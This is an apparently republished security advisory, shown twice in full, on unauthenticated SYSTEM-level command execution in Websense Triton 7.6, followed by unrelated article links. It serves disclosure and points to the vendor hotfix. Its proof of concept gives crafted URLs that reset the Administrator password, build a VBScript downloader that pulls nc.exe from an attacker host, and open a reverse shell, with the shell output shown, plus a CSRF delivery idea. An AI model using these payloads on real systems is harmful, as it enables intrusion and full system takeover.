NGS00140 Technical Advisory: Websense Triton 7.6 - unauthenticated remote command execution as SYSTE
来源:互联网 发布:宁波知豆电动汽车出租 编辑:程序博客网 时间:2024/06/07 05:01
=======
Summary
=======
Name: Websense (Triton 7.6) Unauthenticated remote command execution as SYSTEM
Release Date: 30 April 2012
Reference: NGS00140
Discoverer: Ben Williams <ben.williams (at) ngssecure (dot) com [email concealed]>
Vendor: Websense
Vendor Reference:
Systems Affected:
Risk: Critical
Status: Published
========
TimeLine
========
Discovered: 1 November 2011
Released: 2 November 2011
Approved: 2 November 2011
Reported: 2 November 2011
Fixed: 2 December 2011
Published: 30 April 2012
===========
Description
===========
Websense (Triton 7.6) Unauthenticated remote command execution as SYSTEM
Websense is one of the world's best known web-filter products.
Websense (Triton 7.6) is vulnerable to unauthenticated remote command execution as SYSTEM.
This exploitable via a crafted URL.
There is some character-filtering and substitution in the URL (possibly because this is OS-injection via Perl-injection) these can be worked around, to create/delete/modifiy files, run commands, and ultimately control the system
Many commands can be delivered via a single GET request, so an external attacker could get a reverse-shell payload delivered via CSRF (via any internal user), as long as they can find the proxy address in advance (or guess which subnet it is in).
=================
Technical Details
=================
I. VULNERABILITY
-------------------------
Websense (Triton 7.6) Unauthenticated remote command execution as SYSTEM
II. BACKGROUND
-------------------------
Websense is one of the world's best known web-filter products.
The "Triton" administrative UI allows administration of multiple Websense solutions, including their Email, Web, and DLP products
http://www.websense.com/
III. DESCRIPTION
-------------------------
Websense (Triton 7.6) is prone to Unauthenticated remote command execution as SYSTEM.
IV. PROOF OF CONCEPT
-------------------------
Affected URL: https://192.168.233.30:9443/explorer_wse/ws_irpt.exe (though there could be other potential vectors for introducing executed instructions)
Example which changes the Windows Adminstrator account password to "blah"
https://192.168.233.30:9443/explorer_wse/ws_irpt.exe?&SendFile=echo.pdf%
26net user administrator blah|
This could be very dangerous if the attacker is internal. Other options are available to external attackers such as uploading and running a reverse shell via CSRF.
This can be done by 1) creating a vbscript downloader application which downloads nc.exe:
https://192.168.233.30:9443/explorer_wse/ws_irpt.exe?&SendFile=echo
.pdf%26echo strUrl %3d ^"http:^" %2b chr(47) %2b chr(47) %2b ^"192.168.233.11^" %2b chr(47) %2b ^"nc.exe^"> http.vbs%26echo StrFile %3d ^"nc.exe^" >> http.vbs%26echo Const HTTPREQUEST_PROXYSETTING_DEFAULT %3d 0
>> http.vbs%26echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG %3d 0 >>
http.vbs%26echo Const HTTPREQUEST_PROXYSETTING_DIRECT %3d 1 >> http.vbs%26echo Const HTTPREQUEST_PROXYSETTING_PROXY %3d 2 >> http.vbs%26echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs,
ts >> http.vbs%26echo Err.Clear >> http.vbs%26echo Set http %3d Nothing
>> http.vbs%26echo Set http %3d
CreateObject(^"WinHttp.WinHttpRequest.5.1^") >> http.vbs%26echo If http
Is Nothing Then Set http %3d CreateObject(^"WinHttp.WinHttpRequest^") >>
http.vbs%26echo If http Is Nothing Then Set http %3d
CreateObject(^"MSXML2.ServerXMLHTTP^") >> http.vbs%26echo If http Is
Nothing Then Set http %3d CreateObject(^"Microsoft.XMLHTTP^") >>
http.vbs%26echo http.Open ^"GET^", strURL, False >> http.vbs%26echo
http.Send >> http.vbs%26echo varByteArray %3d http.ResponseBody >>
http.vbs%26echo Set http %3d Nothing >> http.vbs%26echo Set fs %3d
CreateObject(^"Scripting.FileSystemObject^") >> http.vbs%26echo Set ts
%3d fs.CreateTextFile(StrFile, True) >> http.vbs%26echo strData %3d ^"^"
>> http.vbs%26echo strBuffer %3d ^"^" >> http.vbs%26echo For lngCounter
%3d 0 to UBound(varByteArray) >> http.vbs%26echo ts.Write Chr(255 And
Ascb(Midb(varByteArray,lngCounter %2b 1, 1))) >> http.vbs%26echo Next >>
http.vbs%26echo ts.Close >> http.vbs%26http.vbs|
2) Running nc.exe
https://192.168.233.30:9443/explorer_wse/ws_irpt.exe?&SendFile=echo.pdf%
26nc.exe 192.168.233.11 443 -e cmd.exe|
3) Remote SYSTEM shell on attackers system
nc -lvvp 443
listening on [any] 443 ...
192.168.233.30: inverse host lookup failed: Unknown server error :
Connection timed out
connect to [192.168.233.11] from (UNKNOWN) [192.168.233.30] 2828 Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\Program Files\Websense\Web Security\webroot\Explorer>whoami
whoami
nt authority\system
C:\Program Files\Websense\Web Security\webroot\Explorer>dir dir Volume in drive C has no label.
Volume Serial Number is 4CA0-BB76
Directory of C:\Program Files\Websense\Web Security\webroot\Explorer
11/02/2011 11:53 AM <DIR> .
11/02/2011 11:53 AM <DIR> ..
07/14/2011 11:37 PM 2,529 batchchart.jar
07/14/2011 11:37 PM 3,819 body_components.css
07/14/2011 11:36 PM 3,776,598 cal_legend.exe
07/14/2011 11:37 PM 16,374 catcolors.txt
...etc...
As multiple instructions can be delivered in a single GET request it should be easy to launch this attack via CSRF, and because any internal user goes via the proxy the attack can be launched via any internal user clicking on the malicious link or visiting the attackers site with a crafted IMG tag.
===============
Fix Information
===============
This issue is addressed in Hotfix 24, which can be downloaded at:
https://www.websense.com/content/mywebsense-hotfixes.aspx
NGS Secure Research
http://www.ngssecure.com
Summary
=======
Name: Websense (Triton 7.6) Unauthenticated remote command execution as SYSTEM
Release Date: 30 April 2012
Reference: NGS00140
Discoverer: Ben Williams <ben.williams (at) ngssecure (dot) com [email concealed]>
Vendor: Websense
Vendor Reference:
Systems Affected:
Risk: Critical
Status: Published
========
TimeLine
========
Discovered: 1 November 2011
Released: 2 November 2011
Approved: 2 November 2011
Reported: 2 November 2011
Fixed: 2 December 2011
Published: 30 April 2012
===========
Description
===========
Websense (Triton 7.6) Unauthenticated remote command execution as SYSTEM
Websense is one of the world's best known web-filter products.
Websense (Triton 7.6) is vulnerable to unauthenticated remote command execution as SYSTEM.
This exploitable via a crafted URL.
There is some character-filtering and substitution in the URL (possibly because this is OS-injection via Perl-injection) these can be worked around, to create/delete/modifiy files, run commands, and ultimately control the system
Many commands can be delivered via a single GET request, so an external attacker could get a reverse-shell payload delivered via CSRF (via any internal user), as long as they can find the proxy address in advance (or guess which subnet it is in).
=================
Technical Details
=================
I. VULNERABILITY
-------------------------
Websense (Triton 7.6) Unauthenticated remote command execution as SYSTEM
II. BACKGROUND
-------------------------
Websense is one of the world's best known web-filter products.
The "Triton" administrative UI allows administration of multiple Websense solutions, including their Email, Web, and DLP products
http://www.websense.com/
III. DESCRIPTION
-------------------------
Websense (Triton 7.6) is prone to Unauthenticated remote command execution as SYSTEM.
IV. PROOF OF CONCEPT
-------------------------
Affected URL: https://192.168.233.30:9443/explorer_wse/ws_irpt.exe (though there could be other potential vectors for introducing executed instructions)
Example which changes the Windows Adminstrator account password to "blah"
https://192.168.233.30:9443/explorer_wse/ws_irpt.exe?&SendFile=echo.pdf%
26net user administrator blah|
This could be very dangerous if the attacker is internal. Other options are available to external attackers such as uploading and running a reverse shell via CSRF.
This can be done by 1) creating a vbscript downloader application which downloads nc.exe:
https://192.168.233.30:9443/explorer_wse/ws_irpt.exe?&SendFile=echo
.pdf%26echo strUrl %3d ^"http:^" %2b chr(47) %2b chr(47) %2b ^"192.168.233.11^" %2b chr(47) %2b ^"nc.exe^"> http.vbs%26echo StrFile %3d ^"nc.exe^" >> http.vbs%26echo Const HTTPREQUEST_PROXYSETTING_DEFAULT %3d 0
>> http.vbs%26echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG %3d 0 >>
http.vbs%26echo Const HTTPREQUEST_PROXYSETTING_DIRECT %3d 1 >> http.vbs%26echo Const HTTPREQUEST_PROXYSETTING_PROXY %3d 2 >> http.vbs%26echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs,
ts >> http.vbs%26echo Err.Clear >> http.vbs%26echo Set http %3d Nothing
>> http.vbs%26echo Set http %3d
CreateObject(^"WinHttp.WinHttpRequest.5.1^") >> http.vbs%26echo If http
Is Nothing Then Set http %3d CreateObject(^"WinHttp.WinHttpRequest^") >>
http.vbs%26echo If http Is Nothing Then Set http %3d
CreateObject(^"MSXML2.ServerXMLHTTP^") >> http.vbs%26echo If http Is
Nothing Then Set http %3d CreateObject(^"Microsoft.XMLHTTP^") >>
http.vbs%26echo http.Open ^"GET^", strURL, False >> http.vbs%26echo
http.Send >> http.vbs%26echo varByteArray %3d http.ResponseBody >>
http.vbs%26echo Set http %3d Nothing >> http.vbs%26echo Set fs %3d
CreateObject(^"Scripting.FileSystemObject^") >> http.vbs%26echo Set ts
%3d fs.CreateTextFile(StrFile, True) >> http.vbs%26echo strData %3d ^"^"
>> http.vbs%26echo strBuffer %3d ^"^" >> http.vbs%26echo For lngCounter
%3d 0 to UBound(varByteArray) >> http.vbs%26echo ts.Write Chr(255 And
Ascb(Midb(varByteArray,lngCounter %2b 1, 1))) >> http.vbs%26echo Next >>
http.vbs%26echo ts.Close >> http.vbs%26http.vbs|
2) Running nc.exe
https://192.168.233.30:9443/explorer_wse/ws_irpt.exe?&SendFile=echo.pdf%
26nc.exe 192.168.233.11 443 -e cmd.exe|
3) Remote SYSTEM shell on attackers system
nc -lvvp 443
listening on [any] 443 ...
192.168.233.30: inverse host lookup failed: Unknown server error :
Connection timed out
connect to [192.168.233.11] from (UNKNOWN) [192.168.233.30] 2828 Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\Program Files\Websense\Web Security\webroot\Explorer>whoami
whoami
nt authority\system
C:\Program Files\Websense\Web Security\webroot\Explorer>dir dir Volume in drive C has no label.
Volume Serial Number is 4CA0-BB76
Directory of C:\Program Files\Websense\Web Security\webroot\Explorer
11/02/2011 11:53 AM <DIR> .
11/02/2011 11:53 AM <DIR> ..
07/14/2011 11:37 PM 2,529 batchchart.jar
07/14/2011 11:37 PM 3,819 body_components.css
07/14/2011 11:36 PM 3,776,598 cal_legend.exe
07/14/2011 11:37 PM 16,374 catcolors.txt
...etc...
As multiple instructions can be delivered in a single GET request it should be easy to launch this attack via CSRF, and because any internal user goes via the proxy the attack can be launched via any internal user clicking on the malicious link or visiting the attackers site with a crafted IMG tag.
===============
Fix Information
===============
This issue is addressed in Hotfix 24, which can be downloaded at:
https://www.websense.com/content/mywebsense-hotfixes.aspx
NGS Secure Research
http://www.ngssecure.com
- NGS00140 Technical Advisory: Websense Triton 7.6 - unauthenticated remote command execution as SYSTE
- NGS00138 Technical Advisory: Websense Triton 7.6 - authentication bypass in report management UI
- Advisory: Oracle Forms 10g Unauthenticated Remote Code Execution (CVE-2014-4278)
- Gitorious Remote Command Execution
- Anfibia Remote Command Execution
- Exim sender_address Remote Command Execution
- TWiki SEARCH Variable Remote Command Execution Vulnerability
- xterm DECRQSS Remote Command Execution Vulnerability
- gitWeb v1.5.2 Remote Command Execution
- op5 Appliance Multiple Remote Command Execution Vulnerabilities
- RECEME - Remote Command Execution through eMail Exchange
- ZABBIX 'node_process_command()' Remote Command Execution Vulnerability
- Webmin /file/show.cgi Remote Command Execution
- Webmin /file/show.cgi Remote Command Execution
- SAP SOAP RFC SXPG_COMMAND_EXECUTE Remote Command Execution
- SAP SOAP RFC SXPG_CALL_SYSTEM Remote Command Execution
- ZPanel 10.0.0.2 Remote Command Execution
- metasploit - HP Data Protector Remote Command Execution
- 调用CoCreateInstance 函数 返回值-2147221008 错误
- 一个简单的游戏服务器框架
- 交叉编译ARM版 Qt
- 周鸿祎详解360手机战略:赚钱不靠硬件靠服务
- C#如何设置应用程序启动的对象
- NGS00140 Technical Advisory: Websense Triton 7.6 - unauthenticated remote command execution as SYSTE
- IOS开发xcode报错之has been modified since the precompiled header was built
- jmeter emma.jar 采用EMMA对JMeter执行代码覆盖率分析
- IT人的一个思维习惯正帮助其屹立于人群之首
- grep命令参数及用法
- servlet filter初探
- NGS00138 Technical Advisory: Websense Triton 7.6 - authentication bypass in report management UI
- 转:FreeLibraryAndExitThread DLL中线程的安全退出
- App::ExitInstance 测试